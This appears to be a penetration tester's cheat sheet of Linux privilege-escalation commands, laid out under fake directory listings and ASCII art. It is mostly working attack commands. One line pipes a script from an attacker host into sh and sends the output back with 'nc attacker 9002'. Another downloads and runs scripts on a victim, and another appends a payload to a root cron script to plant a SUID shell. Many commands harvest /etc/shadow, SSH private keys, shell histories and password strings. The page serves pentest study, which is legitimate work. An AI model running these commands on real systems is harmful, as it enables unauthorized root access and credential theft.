drwxr-xr-x 8 root root 4096 Dec 14 2017 SMB and RPC Enumeration drwxr-xr-x 8 root root 4096 Dec 14 2017 Web Enumeration drwxr-xr-x 8 root root 4096 Dec 14 2017 Linux PrivEsc drwxr-xr-x 8 root root 4096 Jun 15 2021 Linux Commands drwxr-xr-x 8 root root 4096 Feb 24 2022 DDoS SMB TL;DR You can grab and parse these commands from this page using cURL: curl -s https://harfordcda.neocities.org/privesc.html | sed 's/<[^>]*>//g ; /^$/d'| tr -s '\n' '\n' | sed -r /^r?$/d > privesc.txt

           |`-.._____..-'|
           :  > .  ,  <  :
           `./ __`' __ \,'
            | (|_) (|_) |
            ; _  .  __  :
            `.,' - `-. ,'
              `, `_  .'
              /       \
             /         :
            :          |_
           ,|  .    .  | \
          : :   \   |  |  :
          |  \   :`-;  ;  |
          :   :  | /  /   ;
           :-.'  ;'  / _,'`------.
           `'`''-`'''-'-''--.---  )
                            `----'
Type help for a list of interactive commands.
#################################### Privesc #################################### Rule of shells: One is none and Two is one #################################### Automated scripts for detecting Linux PrivEsc issues: LinEnum LinuxPrivChecker LSE Linpeas
#Grabbing automated script from staging machine #winPeas wget https://github.com/carlospolop/PEASS-ng/blob/master/winPEAS/winPEASexe/binaries/x64/Release/winPEASx64.exe -O winPEASx64.exe powershell Invoke-WebRequest -Uri http://attackingmachine:8081/winPeas.exe -OutFile winPeas.exe #linpeas curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh #attacking machine launch a web server to grab the privesc scripts python -m SimpleHTTPServer 8080 or python3 -m http.server 8080 #downloading from victim wget http://attackingmachine:8080/linPeas.sh -O /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh #Or execute in memory send output back to attacker curl attacker:8000/linpeas.sh | sh | nc attacker 9002 #################################### Kernel Version? #################################### dmesg | grep Linux uname -a cat /etc/issue cat /proc/version rpm -q kernel #redhat #################################### Check sudoers #################################### cat /etc/sudoers sudo -l #################################### #Find SUID and SGID files under root #################################### find / -perm -u=s -type f 2>/dev/null find / -perm +4000 find / -perm -u=s -type f 2>/dev/null find / -perm -g=s -o -perm -u=s -type f 2>/dev/null for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done find / -perm -g=s -o -perm -4000 ! 
-type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null #################################### #Find SGID #################################### find / -perm -g=s -type f 2>/dev/null #################################### #Sticky bit: #################################### find / -perm -1000 -type d 2>/dev/null #################################### #Abusable binaries GTFO Bins #################################### Overwrite misconfigured files: #################################### echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/misconfig.sh #wait until the cron job triggers your payload /tmp/bash -p #################################### Locating world-writable files/dirs/scripts that run as root #################################### #World-writable files/directories find / -writable -type d 2>/dev/null find / -perm -222 -type d 2>/dev/null find / -perm -o w -type d 2>/dev/null find / -perm -o x -type d 2>/dev/null find / \( -perm -o w -perm -o x \) -type d 2>/dev/null #################################### #Common locations for user-installed software #################################### /usr/local/ /usr/local/src /usr/local/bin /opt/ /home /var/ /usr/src/ cut -d ':' -f 7 /etc/passwd | sort -u #################################### Which development tools/languages are installed? #################################### find / -name perl* find / -name python* find / -name gcc* find / -name cc #################################### Which services are running and with which user privilege? ps aux ps -ef top cat /etc/services #################################### Check processes running as root: ps aux | grep root ps -ef | grep root #################################### User and Root home directories: #################################### ls -ahlR /root/ ls -ahlR /home/ #################################### Which services are running and with which user privilege? 
#################################### ps aux ps -ef top cat /etc/services #################################### Which cron jobs are scheduled? #################################### ls -la /etc/cron.d crontab -l ls -alh /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /etc/at.allow cat /etc/at.deny cat /etc/cron.allow cat /etc/cron.deny cat /etc/crontab cat /etc/anacrontab cat /var/spool/cron/crontabs/root #Breakdown #m h dom mon dow user command 17 * 1 * * * root /home/fred/desktop/backup.sh # = ID m = Minute h = Hour dom = Day of the month mon = Month dow = Day of the week user = What user the command will run as command = What command should be run #################################### What is the configuration of the available services? #################################### cat /etc/syslog.conf cat /etc/chttp.conf cat /etc/lighttpd.conf cat /etc/cups/cupsd.conf cat /etc/inetd.conf cat /etc/apache2/apache2.conf cat /etc/my.conf cat /etc/httpd/conf/httpd.conf cat /opt/lampp/etc/httpd.conf ls -aRl /etc/ | awk '$1 ~ /^.*r.*/ #################################### Network Settings #################################### /sbin/ifconfig -a cat /etc/network/interfaces cat /etc/sysconfig/network ip addr #################################### What are the network configuration settings? #################################### cat /etc/resolv.conf cat /etc/sysconfig/network cat /etc/networks iptables -L -v hostname dnsdomainname #################################### Which users and hosts are communicating with the system? #################################### lsof -i lsof -i :80 grep 80 /etc/services netstat -antup netstat -antpx netstat -tulpn chkconfig --list chkconfig --list | grep 3:on last w #################################### Can user information be found? 
#################################### cat ~/.bashrc cat ~/.profile cat /var/mail/root cat /var/spool/mail/root #################################### Finding juicy files #################################### What sensitive files can be found? cat /etc/passwd cat /etc/group cat /etc/shadow ls -alh /var/mail/ /etc/apache2/httpd. /etc/apache2/apache2 /etc/httpd/httpd /etc/httpd/conf/httpd #################################### Any password entries? What else? #################################### cat ~/.bash_history cat ~/.nano_history cat ~/.atftp_history cat ~/.mysql_history cat ~/.php_history grep --color=auto-R -i "passw" --color=always 2> (grep -v 'Permission denied' >&2) grep --color=auto -rnw '/' -ie "PASSW" --color=always 2> /dev/null find . -type f -exec grep -i -I "PASSW" {} /dev/null \; #################################### Can private key information be found? #################################### cat ~/.ssh/authorized_keys cat ~/.ssh/identity.pub cat ~/.ssh/identity cat ~/.ssh/id_rsa.pub cat ~/.ssh/id_rsa cat ~/.ssh/id_dsa.pub cat ~/.ssh/id_dsa cat /etc/ssh/ssh_config cat /etc/ssh/sshd_config cat /etc/ssh/ssh_host_dsa_key.pub cat /etc/ssh/ssh_host_dsa_key cat /etc/ssh/ssh_host_rsa_key.pub cat /etc/ssh/ssh_host_rsa_key cat /etc/ssh/ssh_host_key.pub cat /etc/ssh/ssh_host_key #################################### Which IPs and/or MAC addresses are cached? #################################### arp -e route /sbin/route -nee #################################### How can files be uploaded? #################################### find / -name wget find / -name nc* find / -name netcat* find / -name tftp* find / -name ftp find / -name ncat* #################################### Other references: gotm1lk mubix Swisskyrepo